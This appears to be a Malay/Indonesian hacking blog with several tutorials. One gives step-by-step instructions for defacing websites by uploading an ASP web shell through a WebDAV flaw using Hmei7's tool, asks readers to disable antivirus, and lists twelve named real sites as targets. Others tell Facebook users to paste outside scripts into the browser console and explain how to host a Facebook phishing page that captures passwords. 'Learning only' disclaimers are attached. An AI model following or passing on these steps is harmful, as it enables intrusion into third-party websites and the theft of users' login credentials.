Toutorial : Webdav Rootkit

Assalamualaikum.....entry kali ni aku nk ajar korang cara deface menggunakan WebDav oleh Hmei7.Untuk maklumat korang, Deface menggunakan WebDev ini korang dapat menanam shell.Baiklah...jom mula...

Download Files :

Korang perlu download file2nya terlebih dahulu :

Download : Rootkit
Password  : cbf
Download : Shell 


note : anda haru tutup antivirus anda.Kalau tidak antivirus akan detect rootkit tu sebagai virus.


Cara-cara Menggunakannya : 


1. Buka tool rootkit. Akan keluar macam gambar dibawah:

2.Klik WebDav lalu klik Asp shell maker seperti gambar diatas.

Lepas tu akan keluar mcam gambar dibawah:

3.Click setting...akan keluar mcm gambar dibawah:

4.Lepas keluar macam tu.. korang semua rename Hmei7 tu kepada nama ape juga nama yg korang  suka. Ingat, tukar Hmei7 tu aje... yg .asp;.txt jangan ubah langsung.

5.Pastu... korang kena Load shell from file. Seperti gambar dibawah:

6.Bila klik load je, otomatik akan kluar korang punye window, pastu cari shells korang tu yg file dia hujungnya macam ni >>> .asp;.jpg ... tgk gambar dibawah..

Cari shell anda tadi.pastikan anda telah extract terlebih dahulu.

Shell anda mesti hujung nama dia macam ni ---> .asp;.jpg

Then tekan open.

7.Selepas itu, Click add site.seperti gambar bawah:

8.Letak url yang u all nak target... Pastu Klik Serang!!.. Bila dah serang dia akan keluar macam gambar kat bawah...

Kalau web vuln macam tu la hasilnya.. Kalau tak vuln, lain lah bunyinye.. jadi.. bila dapat je url macam kt atas tu.. u all copy dan paste kat browser.. Contoh : http://www.TargetSite.com/ShellAku.asp;.txt

---------------------------------------------------------------------------

Pastu u all akan jumpe perkataan dalam site tu, UPLOAD bla bla bla...

Upload deface page... Contoh: apeape.html atau apepae.htm

Pastu slow2 scroll down..

Cari index.asp >> ada kt area tu perkataan ren (rename apa2 janji .asp) >> submit    -nota- kalau tak jumpe, cari index.php , default.asp , index.html , default.html ,  etc.. pandai2.. hacker kena pandai..

Pastu scroll down cari DefacePageAnda.htm  >> ren (rename) >> index.asp

Selesai... tgk trus main url http://www.TargetSite.com/

Website dah di defaced oleh anda.. :)

U all leh test website2 kt bawah ni.. sebagai permulaan.. Ape yang I nasihatkan ialah, u all jangan delete apa2 kat website dorang.. Ingat... Kalau tak jadi,, cuba lagi, jangan sebab tak dapat deface, korang delete pulak ape2 yang kat website dorang.. Ingat ye.. Semoga berjaya.. :)

Vuln Website (mungkin ade yg sudah patch) :

http://www.bao168.com

http://www.hkloong.com

http://www.gteec.com/

http://www.balingshan.com/

http://www.hrbswx.com/

http://www.871871.cc/

http://www.md999.net.cn/

http://bbs.nan-gang.gov.cn/

http://www.icts-mz.com/

http://www.hnains.net/

http://www.hlyy-sh.com/

http://www.hsgtzy.gov.cn/

Komen kat bawah untuk pertanyaan...

-Disclaimer-

Hanya untuk tujuan pembelajaran, aku tidak bertanggungjawab atas kerosakan yang akan terjadi pada computer atau website yang anda deface.

Toutorial : Tuka Style Facebook

Ikut Langkah-Langkah ini

1. Login  Facebook Anda ,  Kemuadian Bukak Link
Ni http://timelineremovers.net46.net/

Okeyy  , Now Ikot Gambar ni

1. Login Email , dngn Pasword Facebook Anda

2. Bukak Link Ni : 

=> http://pastebin.com/raw.php?i=ebAmgdvH 

================

(Ctrl + A) = Select All Code 

(Ctrl + C ) = Copy Code 

3. Kalau Dahh ~ Bukak Facebook Yang Korang Login Tadi , 

Kemudian Tekan F12 Ianya Akan Keluar Seperti Gambar Di Bawah  

4. Korang Paste Code Yang Korang Copy Tadi dekat Console (Ctrl + V) 

Macam Gambar Kat Bawah ni 

5. Kemua Dian Tunggu Beberape Saat Jadi mcm Gambar di Bawah ni 

Toutorial : Auto Tagg Friend Facebook (Comment)

Mungkin auto tag ni ramai dah tahu dan ramai dah guna,tapi ada sesetang orang yang masih tak tahu nak menggunakan auto tag ni... Ok hari ni admin akan ajar step by step cara - cara nak buat auto tag

Benda yang korang perlu ada

1) Script AutoTag. Kalau tak ada boleh Klik Sini untuk mendapatkan script auto tag
2) Kesabaran

Langkah 1

Bukak script autotag

Ini adalah sebahagian dari script autotag

Langkah 2: Bukak Fb korang dan update apa sahaja status yang korang suka,

Langkah 3: Right Click pada mouse dan pilih inspect element

Setelah korang tekan inspect element,satu kotak keluar dibawah seperti ini

Langkah 4: Pilih Console

Setelah korang bukak Console,pergi ke status yang korang buat tadi dan pastekan script autotag lalu tekan enter

Dan Hasilnya 

toutorial : Cara Hack/Phising Facebook 2013

Mungkin sebagian besar dari sobat sudah tau apa itu web phising dan sudah tau bagaimana cara membuat serta menguploadnya ke salah satu web hoting yang tersedia... Namun saya yakin diantara sobat masih ada yang belum tau dan paham apa itu web phising serta belum tau bagaimanacara menghosting web tersebut ke webhosting yang tersedia. 

Nah pada kesempatan ini saya akan menjelaskan bagaimana cara Membuat Web Phising untuk Mendapatkan Email dan Password beserta Bagaimana cara menghosting filenya...

Sebelum saya menjelaskan cara membuat website phising ini, alangkah baiknya bila sobat mengetahui apa itu Web Phising dan Apa kegunaannya...!!! Web Phising halaman fake login atau halaman palsu dari sebuah website (contoh : halaman utama facebook) dan keguanan dari web phising ini yakni untuk mendapatkan informasi sensitif, seperti email/username, password dan lain sebagainya... 

Sobat bisa mendownload yang sudah siap pakai:

Download Facebook Phishing

Download Facebook Phishing for Mobile <- Klik

Selanjutnya, Upload filenya ke webhost yang sobat punya. Saran saya agar tidak cepat di suspended, hosting filenya ke webhost yang berbayar, tapi kalau tidak punya uang, sobat bisa gunakan webhost yang gratis.

Untuk tutorial membuat Hosting, silahkan baca Cara Membuat Hosting Gratis Di Idhostinger

Setelah Semua File di upload, sobat tinggal mencobanya. sebelumnya dicek dulu apakah Phisingnya bekerja atau tidak! 

untuk melihat Hasilnya, sobat cukup melihatnya dengan menambahkan Password.txt setelah link sobat! Contoh: http://sitesobat/password.txt

Gunakan Kreatifmu agar Facebook Palsu sobat ga dicurigai sebagai Phishing! Sebagai contoh ane kasi liat punya ane... 

DEMO PHISHING FACEBOOK  

 Semoga bermanfaat...!!!

Toutorial Video

NB : Tutorial ini hanya untuk menambah pengetahuan di bidang IT, bukan untuk disalahgunakan dan saya tidak bertanggung jawab jika ada pihak tertentu yang menyalahgunakan web phising ini...!